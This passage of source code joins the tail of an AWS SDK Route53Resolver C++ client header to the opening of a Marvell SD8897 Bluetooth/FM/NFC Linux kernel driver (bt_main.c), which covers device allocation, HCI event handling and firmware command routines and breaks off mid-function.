Aws::Client::AsyncCallerContext>& context) const; void GetResolverRuleAssociationAsyncHelper(const Model::GetResolverRuleAssociationRequest& request, const GetResolverRuleAssociationResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void GetResolverRulePolicyAsyncHelper(const Model::GetResolverRulePolicyRequest& request, const GetResolverRulePolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverDnssecConfigsAsyncHelper(const Model::ListResolverDnssecConfigsRequest& request, const ListResolverDnssecConfigsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverEndpointIpAddressesAsyncHelper(const Model::ListResolverEndpointIpAddressesRequest& request, const ListResolverEndpointIpAddressesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverEndpointsAsyncHelper(const Model::ListResolverEndpointsRequest& request, const ListResolverEndpointsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverQueryLogConfigAssociationsAsyncHelper(const Model::ListResolverQueryLogConfigAssociationsRequest& request, const ListResolverQueryLogConfigAssociationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverQueryLogConfigsAsyncHelper(const Model::ListResolverQueryLogConfigsRequest& request, const ListResolverQueryLogConfigsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverRuleAssociationsAsyncHelper(const Model::ListResolverRuleAssociationsRequest& request, const ListResolverRuleAssociationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListResolverRulesAsyncHelper(const Model::ListResolverRulesRequest& request, const ListResolverRulesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void ListTagsForResourceAsyncHelper(const Model::ListTagsForResourceRequest& request, const ListTagsForResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void PutResolverQueryLogConfigPolicyAsyncHelper(const Model::PutResolverQueryLogConfigPolicyRequest& request, const PutResolverQueryLogConfigPolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void PutResolverRulePolicyAsyncHelper(const Model::PutResolverRulePolicyRequest& request, const PutResolverRulePolicyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void TagResourceAsyncHelper(const Model::TagResourceRequest& request, const TagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void UntagResourceAsyncHelper(const Model::UntagResourceRequest& request, const UntagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void UpdateResolverDnssecConfigAsyncHelper(const Model::UpdateResolverDnssecConfigRequest& request, const UpdateResolverDnssecConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void UpdateResolverEndpointAsyncHelper(const Model::UpdateResolverEndpointRequest& request, const UpdateResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; void UpdateResolverRuleAsyncHelper(const Model::UpdateResolverRuleRequest& request, const UpdateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const; Aws::String m_uri; Aws::String m_configScheme; std::shared_ptr<Aws::Utils::Threading::Executor> m_executor; }; } // namespace Route53Resolver } // namespace Aws
/** @file bt_main.c * * @brief This file contains the major functions in BlueTooth * driver. It includes init, exit, open, close and main * thread etc.. * * Copyright (C) 2007-2013, Marvell International Ltd. * * This software file (the "File") is distributed by Marvell International * Ltd. under the terms of the GNU General Public License Version 2, June 1991 * (the "License"). You may use, redistribute and/or modify this File in * accordance with the terms and conditions of the License, a copy of which * is available along with the File in the gpl.txt file or by writing to * the Free Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA * 02111-1307 or on the worldwide web at http://www.gnu.org/licenses/gpl.txt. * * THE FILE IS DISTRIBUTED AS-IS, WITHOUT WARRANTY OF ANY KIND, AND THE * IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE * ARE EXPRESSLY DISCLAIMED. The License provides additional details about * this warranty disclaimer. * */ /** * @mainpage M-BT Linux Driver * * @section overview_sec Overview * * The M-BT is a Linux reference driver for Marvell Bluetooth chipset. * * @section copyright_sec Copyright * * Copyright (C) 2007-2013, Marvell International Ltd. * */ #include <linux/module.h> #include <linux/platform_device.h> #include <linux/wlan_plat.h> #include <linux/interrupt.h> #include "bt_drv.h" #include "mbt_char.h" #include "bt_sdio.h" /** Version */ #define VERSION "M2614110" /** Driver version */ static char mbt_driver_version[] = "SD8897-%s-" VERSION "-(" "FP" FPNUM ")" #ifdef DEBUG_LEVEL2 "-dbg" #endif " "; /** Declare and initialize fw_version */ static char fw_version[32] = "0.0.0.p0"; #define AID_SYSTEM 1000 /* system server */ #define AID_BLUETOOTH 1002 /* bluetooth subsystem */ /** Define module name */ #define MODULE_NAME "bt_fm_nfc" /** Declaration of chardev class */ static struct class *chardev_class; /** Interface specific variables */ static int mbtchar_minor; static int fmchar_minor; static int nfcchar_minor; static int debugchar_minor; /** Default Driver mode */ static int drv_mode = (DRV_MODE_BT | DRV_MODE_FM | DRV_MODE_NFC); /** BT interface name */ static char *bt_name; /** FM interface name */ static char *fm_name; /** NFC interface name */ static char *nfc_name; /** BT debug interface name */ static char *debug_name; /** Firmware flag */ static int fw = 1; /** default powermode */ static int psmode = 1; /** Init config file (MAC address, register etc.) */ static char *init_cfg; /** Calibration config file (MAC address, init powe etc.) */ static char *cal_cfg; /** Calibration config file EXT */ static char *cal_cfg_ext; /** Init MAC address */ static char *bt_mac; /** Setting mbt_drvdbg value based on DEBUG level */ #ifdef DEBUG_LEVEL1 #ifdef DEBUG_LEVEL2 #define DEFAULT_DEBUG_MASK (0xffffffff & ~DBG_EVENT) #else #define DEFAULT_DEBUG_MASK (DBG_MSG | DBG_FATAL | DBG_ERROR) #endif /* DEBUG_LEVEL2 */ u32 mbt_drvdbg = DEFAULT_DEBUG_MASK; #endif #ifdef SDIO_SUSPEND_RESUME /** PM keep power */ int mbt_pm_keep_power = 1; #endif static int debug_intf = 1; /** Enable minicard power-up/down */ static int minicard_pwrup = 1; /** Pointer to struct with control hooks */ static struct wifi_platform_data *bt_control_data; #define IORESOURCE_NAME "mrvl_bt_irq" #define DRIVER_NAME "bt hostwake" void mdev_poweroff(struct m_dev *m_dev); static struct resource *bt_irqres; static int irq_registered; static void bt_register_hostwake_irq(void *handle); /** * @brief Alloc bt device * * @return pointer to structure mbt_dev or NULL */ struct mbt_dev * alloc_mbt_dev(void) { struct mbt_dev *mbt_dev; ENTER(); mbt_dev = kzalloc(sizeof(struct mbt_dev), GFP_KERNEL); if (!mbt_dev) { LEAVE(); return NULL; } LEAVE(); return mbt_dev; } /** * @brief Alloc fm device * * @return pointer to structure fm_dev or NULL */ struct fm_dev * alloc_fm_dev(void) { struct fm_dev *fm_dev; ENTER(); fm_dev = kzalloc(sizeof(struct fm_dev), GFP_KERNEL); if (!fm_dev) { LEAVE(); return NULL; } LEAVE(); return fm_dev; } /** * @brief Alloc nfc device * * @return pointer to structure nfc_dev or NULL */ struct nfc_dev * alloc_nfc_dev(void) { struct nfc_dev *nfc_dev; ENTER(); nfc_dev = kzalloc(sizeof(struct nfc_dev), GFP_KERNEL); if (!nfc_dev) { LEAVE(); return NULL; } LEAVE(); return nfc_dev; } /** * @brief Alloc debug device * * @return pointer to structure debug_level or NULL */ struct debug_dev * alloc_debug_dev(void) { struct debug_dev *debug_dev; ENTER(); debug_dev = kzalloc(sizeof(struct debug_dev), GFP_KERNEL); if (!debug_dev) { LEAVE(); return NULL; } LEAVE(); return debug_dev; } /** * @brief Frees m_dev * * @return N/A */ void free_m_dev(struct m_dev *m_dev) { ENTER(); kfree(m_dev->dev_pointer); m_dev->dev_pointer = NULL; LEAVE(); } /** * @brief This function verify the received event pkt * * Event format: * +--------+--------+--------+--------+--------+ * | Event | Length | ncmd | Opcode | * +--------+--------+--------+--------+--------+ * | 1-byte | 1-byte | 1-byte | 2-byte | * +--------+--------+--------+--------+--------+ * * @param priv A pointer to bt_private structure * @param skb A pointer to rx skb * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int check_evtpkt(bt_private * priv, struct sk_buff *skb) { struct hci_event_hdr *hdr = (struct hci_event_hdr *)skb->data; struct hci_ev_cmd_complete *ec; u16 opcode, ocf; int ret = BT_STATUS_SUCCESS; ENTER(); if (!priv->bt_dev.sendcmdflag) { ret = BT_STATUS_FAILURE; goto exit; } if (hdr->evt == HCI_EV_CMD_COMPLETE) { ec = (struct hci_ev_cmd_complete *) (skb->data + HCI_EVENT_HDR_SIZE); opcode = __le16_to_cpu(ec->opcode); ocf = hci_opcode_ocf(opcode); PRINTM(CMD, "BT: CMD_COMPLTE ocf=0x%x, send_cmd_ocf=0x%x\n", ocf, priv->bt_dev.send_cmd_ocf); if (ocf != priv->bt_dev.send_cmd_ocf) { ret = BT_STATUS_FAILURE; goto exit; } switch (ocf) { case BT_CMD_MODULE_CFG_REQ: case BT_CMD_BLE_DEEP_SLEEP: case BT_CMD_CONFIG_MAC_ADDR: case BT_CMD_CSU_WRITE_REG: case BT_CMD_LOAD_CONFIG_DATA: case BT_CMD_LOAD_CONFIG_DATA_EXT: case BT_CMD_AUTO_SLEEP_MODE: case BT_CMD_HOST_SLEEP_CONFIG: case BT_CMD_SDIO_PULL_CFG_REQ: case BT_CMD_RESET: priv->bt_dev.sendcmdflag = FALSE; priv->adapter->cmd_complete = TRUE; wake_up_interruptible(&priv->adapter->cmd_wait_q); break; case BT_CMD_GET_FW_VERSION: { u8 *pos = (skb->data + HCI_EVENT_HDR_SIZE + sizeof(struct hci_ev_cmd_complete) + 1); snprintf(fw_version, sizeof(fw_version), "%u.%u.%u.p%u", pos[2], pos[1], pos[0], pos[3]); priv->bt_dev.sendcmdflag = FALSE; priv->adapter->cmd_complete = TRUE; wake_up_interruptible(&priv->adapter-> cmd_wait_q); break; } #ifdef SDIO_SUSPEND_RESUME case FM_CMD: { u8 *pos = (skb->data + HCI_EVENT_HDR_SIZE + sizeof(struct hci_ev_cmd_complete) + 1); if (*pos == FM_SET_INTR_MASK) { priv->bt_dev.sendcmdflag = FALSE; priv->adapter->cmd_complete = TRUE; wake_up_interruptible(&priv->adapter-> cmd_wait_q); } } break; #endif case BT_CMD_HOST_SLEEP_ENABLE: priv->bt_dev.sendcmdflag = FALSE; break; default: ret = BT_STATUS_FAILURE; break; } } exit: if (ret == BT_STATUS_SUCCESS) kfree_skb(skb); LEAVE(); return ret; } /** * @brief This function process the received event * * Event format: * +--------+--------+--------+--------+-----+ * | EC | Length | Data | * +--------+--------+--------+--------+-----+ * | 1-byte | 1-byte | n-byte | * +--------+--------+--------+--------+-----+ * * @param priv A pointer to bt_private structure * @param skb A pointer to rx skb * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_process_event(bt_private * priv, struct sk_buff *skb) { int ret = BT_STATUS_SUCCESS; struct m_dev *m_dev = &(priv->bt_dev.m_dev[BT_SEQ]); BT_EVENT *pevent; ENTER(); pevent = (BT_EVENT *) skb->data; if (pevent->EC != 0xff) { PRINTM(CMD, "BT: Not Marvell Event=0x%x\n", pevent->EC); ret = BT_STATUS_FAILURE; goto exit; } switch (pevent->data[0]) { case BT_CMD_AUTO_SLEEP_MODE: if (pevent->data[2] == BT_STATUS_SUCCESS) { if (pevent->data[1] == BT_PS_ENABLE) priv->adapter->psmode = 1; else priv->adapter->psmode = 0; PRINTM(CMD, "BT: PS Mode %s:%s\n", m_dev->name, (priv->adapter->psmode) ? "Enable" : "Disable"); } else { PRINTM(CMD, "BT: PS Mode Command Fail %s\n", m_dev->name); } break; case BT_CMD_HOST_SLEEP_CONFIG: if (pevent->data[3] == BT_STATUS_SUCCESS) { PRINTM(CMD, "BT: %s: gpio=0x%x, gap=0x%x\n", m_dev->name, pevent->data[1], pevent->data[2]); } else { PRINTM(CMD, "BT: %s: HSCFG Command Fail\n", m_dev->name); } break; case BT_CMD_HOST_SLEEP_ENABLE: if (pevent->data[1] == BT_STATUS_SUCCESS) { priv->adapter->hs_state = HS_ACTIVATED; if (priv->adapter->suspend_fail == FALSE) { #ifdef SDIO_SUSPEND_RESUME #ifdef MMC_PM_KEEP_POWER #ifdef MMC_PM_FUNC_SUSPENDED bt_is_suspended(priv); #endif #endif #endif wake_up_interruptible(&priv->adapter-> cmd_wait_q); } if (priv->adapter->psmode) priv->adapter->ps_state = PS_SLEEP; PRINTM(CMD, "BT: EVENT %s: HS ACTIVATED!\n", m_dev->name); } else { PRINTM(CMD, "BT: %s: HS Enable Fail\n", m_dev->name); } break; case BT_CMD_MODULE_CFG_REQ: if ((priv->bt_dev.sendcmdflag == TRUE) && ((pevent->data[1] == MODULE_BRINGUP_REQ) || (pevent->data[1] == MODULE_SHUTDOWN_REQ))) { if (pevent->data[1] == MODULE_BRINGUP_REQ) { PRINTM(CMD, "BT: EVENT %s:%s\n", m_dev->name, (pevent->data[2] && (pevent->data[2] != MODULE_CFG_RESP_ALREADY_UP)) ? "Bring up Fail" : "Bring up success"); priv->bt_dev.devType = pevent->data[3]; PRINTM(CMD, "devType:%s\n", (pevent->data[3] == DEV_TYPE_AMP) ? "AMP controller" : "BR/EDR controller"); priv->bt_dev.devFeature = pevent->data[4]; PRINTM(CMD, "devFeature: %s, %s, %s, %s, %s\n", ((pevent-> data[4] & DEV_FEATURE_BT) ? "BT Feature" : "No BT Feature"), ((pevent-> data[4] & DEV_FEATURE_BTAMP) ? "BTAMP Feature" : "No BTAMP Feature"), ((pevent-> data[4] & DEV_FEATURE_BLE) ? "BLE Feature" : "No BLE Feature"), ((pevent-> data[4] & DEV_FEATURE_FM) ? "FM Feature" : "No FM Feature"), ((pevent-> data[4] & DEV_FEATURE_NFC) ? "NFC Feature" : "No NFC Feature")); } if (pevent->data[1] == MODULE_SHUTDOWN_REQ) { PRINTM(CMD, "BT: EVENT %s:%s\n", m_dev->name, (pevent->data[2]) ? "Shut down Fail" : "Shut down success"); } if (pevent->data[2]) { priv->bt_dev.sendcmdflag = FALSE; priv->adapter->cmd_complete = TRUE; wake_up_interruptible(&priv->adapter-> cmd_wait_q); } } else { PRINTM(CMD, "BT_CMD_MODULE_CFG_REQ resp for APP\n"); ret = BT_STATUS_FAILURE; } break; case BT_EVENT_POWER_STATE: if (pevent->data[1] == BT_PS_SLEEP) priv->adapter->ps_state = PS_SLEEP; PRINTM(CMD, "BT: EVENT %s:%s\n", m_dev->name, (priv->adapter->ps_state) ? "PS_SLEEP" : "PS_AWAKE"); break; case BT_CMD_SDIO_PULL_CFG_REQ: if (pevent->data[pevent->length - 1] == BT_STATUS_SUCCESS) PRINTM(CMD, "BT: %s: SDIO pull configuration success\n", m_dev->name); else { PRINTM(CMD, "BT: %s: SDIO pull configuration fail\n", m_dev->name); } break; default: PRINTM(CMD, "BT: Unknown Event=%d %s\n", pevent->data[0], m_dev->name); ret = BT_STATUS_FAILURE; break; } exit: if (ret == BT_STATUS_SUCCESS) kfree_skb(skb); LEAVE(); return ret; } /** * @brief This function shows debug info for timeout of command sending. * * @param adapter A pointer to bt_adapter * @param cmd Timeout command id * * @return N/A */ static void bt_cmd_timeout_func(bt_adapter * adapter, u16 cmd) { ENTER(); adapter->num_cmd_timeout++; PRINTM(ERROR, "Version = %s\n", adapter->drv_ver); PRINTM(ERROR, "Timeout Command id = 0x%x\n", cmd); PRINTM(ERROR, "Number of command timeout = %d\n", adapter->num_cmd_timeout); PRINTM(ERROR, "Interrupt counter = %d\n", adapter->IntCounter); PRINTM(ERROR, "Power Save mode = %d\n", adapter->psmode); PRINTM(ERROR, "Power Save state = %d\n", adapter->ps_state); PRINTM(ERROR, "Host Sleep state = %d\n", adapter->hs_state); PRINTM(ERROR, "hs skip count = %d\n", adapter->hs_skip); PRINTM(ERROR, "suspend_fail flag = %d\n", adapter->suspend_fail); PRINTM(ERROR, "suspended flag = %d\n", adapter->is_suspended); PRINTM(ERROR, "Number of wakeup tries = %d\n", adapter->WakeupTries); PRINTM(ERROR, "Host Cmd complet state = %d\n", adapter->cmd_complete); PRINTM(ERROR, "Last irq recv = %d\n", adapter->irq_recv); PRINTM(ERROR, "Last irq processed = %d\n", adapter->irq_done); PRINTM(ERROR, "sdio int status = %d\n", adapter->sd_ireg); PRINTM(ERROR, "tx pending = %d\n", adapter->skb_pending); LEAVE(); } /** * @brief This function send reset cmd to firmware * * @param priv A pointer to bt_private structure * * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_send_reset_command(bt_private * priv) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_HCI_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_HCI_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_HCI_CMD *) skb->data; pcmd->ocf_ogf = (RESET_OGF << 10) | BT_CMD_RESET; pcmd->length = 0x00; pcmd->cmd_type = 0x00; bt_cb(skb)->pkt_type = HCI_COMMAND_PKT; skb_put(skb, 3); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_RESET; priv->adapter->cmd_complete = FALSE; PRINTM(CMD, "Queue Reset Command(0x%x)\n", pcmd->ocf_ogf); wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(MSG, "BT: Reset timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_RESET); } else { PRINTM(CMD, "BT: Reset Command done\n"); } exit: LEAVE(); return ret; } /** * @brief This function sends module cfg cmd to firmware * * Command format: * +--------+--------+--------+--------+--------+--------+--------+ * | OCF OGF | Length | Data | * +--------+--------+--------+--------+--------+--------+--------+ * | 2-byte | 1-byte | 4-byte | * +--------+--------+--------+--------+--------+--------+--------+ * * @param priv A pointer to bt_private structure * @param subcmd sub command * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_send_module_cfg_cmd(bt_private * priv, int subcmd) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "BT: No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_MODULE_CFG_REQ; pcmd->length = 1; pcmd->data[0] = subcmd; bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_MODULE_CFG_REQ; priv->adapter->cmd_complete = FALSE; PRINTM(CMD, "Queue module cfg Command(0x%x)\n", pcmd->ocf_ogf); wake_up_interruptible(&priv->MainThread.waitQ); /* On some Android platforms certain delay is needed for HCI daemon to remove this module and close itself gracefully. Otherwise it hangs. This 10ms delay is a workaround for such platforms as the root cause has not been found yet. */ mdelay(10); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(MSG, "BT: module_cfg_cmd (0x%x): " "timeout sendcmdflag=%d\n", subcmd, priv->bt_dev.sendcmdflag); bt_cmd_timeout_func(priv->adapter, BT_CMD_MODULE_CFG_REQ); } else { PRINTM(CMD, "BT: module cfg Command done\n"); } exit: LEAVE(); return ret; } /** * @brief This function enables power save mode * * @param priv A pointer to bt_private structure * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_enable_ps(bt_private * priv) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_AUTO_SLEEP_MODE; if (priv->bt_dev.psmode) pcmd->data[0] = BT_PS_ENABLE; else pcmd->data[0] = BT_PS_DISABLE; if (priv->bt_dev.idle_timeout) { pcmd->length = 3; pcmd->data[1] = (u8) (priv->bt_dev.idle_timeout & 0x00ff); pcmd->data[2] = (priv->bt_dev.idle_timeout & 0xff00) >> 8; } else { pcmd->length = 1; } bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); PRINTM(CMD, "Queue PSMODE Command(0x%x):%d\n", pcmd->ocf_ogf, pcmd->data[0]); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_AUTO_SLEEP_MODE; priv->adapter->cmd_complete = FALSE; wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(MSG, "BT: psmode timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_AUTO_SLEEP_MODE); } exit: LEAVE(); return ret; } /** * @brief This function sends hscfg command * * @param priv A pointer to bt_private structure * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_send_hscfg_cmd(bt_private * priv) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_HOST_SLEEP_CONFIG; pcmd->length = 2; pcmd->data[0] = (priv->bt_dev.gpio_gap & 0xff00) >> 8; pcmd->data[1] = (u8) (priv->bt_dev.gpio_gap & 0x00ff); bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); PRINTM(CMD, "Queue HSCFG Command(0x%x),gpio=0x%x,gap=0x%x\n", pcmd->ocf_ogf, pcmd->data[0], pcmd->data[1]); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_HOST_SLEEP_CONFIG; priv->adapter->cmd_complete = FALSE; wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(MSG, "BT: HSCFG timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_HOST_SLEEP_CONFIG); } exit: LEAVE(); return ret; } /** * @brief This function sends sdio pull ctrl command * * @param priv A pointer to bt_private structure * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_send_sdio_pull_ctrl_cmd(bt_private * priv) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_SDIO_PULL_CFG_REQ; pcmd->length = 4; pcmd->data[0] = (priv->bt_dev.sdio_pull_cfg & 0x000000ff); pcmd->data[1] = (priv->bt_dev.sdio_pull_cfg & 0x0000ff00) >> 8; pcmd->data[2] = (priv->bt_dev.sdio_pull_cfg & 0x00ff0000) >> 16; pcmd->data[3] = (priv->bt_dev.sdio_pull_cfg & 0xff000000) >> 24; bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); PRINTM(CMD, "Queue SDIO PULL CFG Command(0x%x), PullUp=0x%x%x,PullDown=0x%x%x\n", pcmd->ocf_ogf, pcmd->data[1], pcmd->data[0], pcmd->data[3], pcmd->data[2]); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_SDIO_PULL_CFG_REQ; priv->adapter->cmd_complete = FALSE; wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(MSG, "BT: SDIO PULL CFG timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_SDIO_PULL_CFG_REQ); } exit: LEAVE(); return ret; } #ifdef SDIO_SUSPEND_RESUME /** * @brief This function set FM interrupt mask * * @param priv A pointer to bt_private structure * * @param priv FM interrupt mask value * * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int fm_set_intr_mask(bt_private * priv, u32 mask) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } pcmd = (BT_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | FM_CMD; pcmd->length = 0x05; pcmd->data[0] = FM_SET_INTR_MASK; memcpy(&pcmd->data[1], &mask, sizeof(mask)); PRINTM(CMD, "FM set intr mask=0x%x\n", mask); bt_cb(skb)->pkt_type = HCI_COMMAND_PKT; skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length); skb->dev = (void *)(&(priv->bt_dev.m_dev[FM_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = FM_CMD; priv->adapter->cmd_complete = FALSE; wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout(priv->adapter->cmd_wait_q, priv->adapter->cmd_complete, WAIT_UNTIL_CMD_RESP)) { ret = BT_STATUS_FAILURE; PRINTM(MSG, "FM: set intr mask=%d timeout\n", (int)mask); bt_cmd_timeout_func(priv->adapter, FM_CMD); } exit: LEAVE(); return ret; } #endif /** * @brief This function enables host sleep * * @param priv A pointer to bt_private structure * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_enable_hs(bt_private * priv) { struct sk_buff *skb = NULL; int ret = BT_STATUS_SUCCESS; BT_CMD *pcmd; ENTER(); skb = bt_skb_alloc(sizeof(BT_CMD), GFP_ATOMIC); if (skb == NULL) { PRINTM(WARN, "No free skb\n"); ret = BT_STATUS_FAILURE; goto exit; } priv->adapter->suspend_fail = FALSE; pcmd = (BT_CMD *) skb->data; pcmd->ocf_ogf = (VENDOR_OGF << 10) | BT_CMD_HOST_SLEEP_ENABLE; pcmd->length = 0; bt_cb(skb)->pkt_type = MRVL_VENDOR_PKT; skb_put(skb, BT_CMD_HEADER_SIZE + pcmd->length); skb->dev = (void *)(&(priv->bt_dev.m_dev[BT_SEQ])); skb_queue_head(&priv->adapter->tx_queue, skb); priv->bt_dev.sendcmdflag = TRUE; priv->bt_dev.send_cmd_ocf = BT_CMD_HOST_SLEEP_ENABLE; PRINTM(CMD, "Queue hs enable Command(0x%x)\n", pcmd->ocf_ogf); wake_up_interruptible(&priv->MainThread.waitQ); if (!os_wait_interruptible_timeout (priv->adapter->cmd_wait_q, priv->adapter->hs_state, WAIT_UNTIL_HS_STATE_CHANGED)) { PRINTM(MSG, "BT: Enable host sleep timeout:\n"); bt_cmd_timeout_func(priv->adapter, BT_CMD_HOST_SLEEP_ENABLE); } OS_INT_DISABLE; if ((priv->adapter->hs_state == HS_ACTIVATED) || (priv->adapter->is_suspended == TRUE)) { OS_INT_RESTORE; PRINTM(MSG, "BT: suspend success! skip=%d\n", priv->adapter->hs_skip); } else { priv->adapter->suspend_fail = TRUE; OS_INT_RESTORE; priv->adapter->hs_skip++; ret = BT_STATUS_FAILURE; PRINTM(MSG, "BT: suspend skipped! " "state=%d skip=%d ps_state= %d WakeupTries=%d\n", priv->adapter->hs_state, priv->adapter->hs_skip, priv->adapter->ps_state, priv->adapter->WakeupTries); } exit: LEAVE(); return ret; } /** * @brief This function sets ble deepsleep mode * * @param priv A pointer to bt_private structure * @param mode TRUE/FALSE * * @return BT_STATUS_SUCCESS or BT_STATUS_FAILURE */ int bt_set_ble_deepsleep(bt_private * priv, int mode) { struct sk_buff *skb = NULL; int ret = 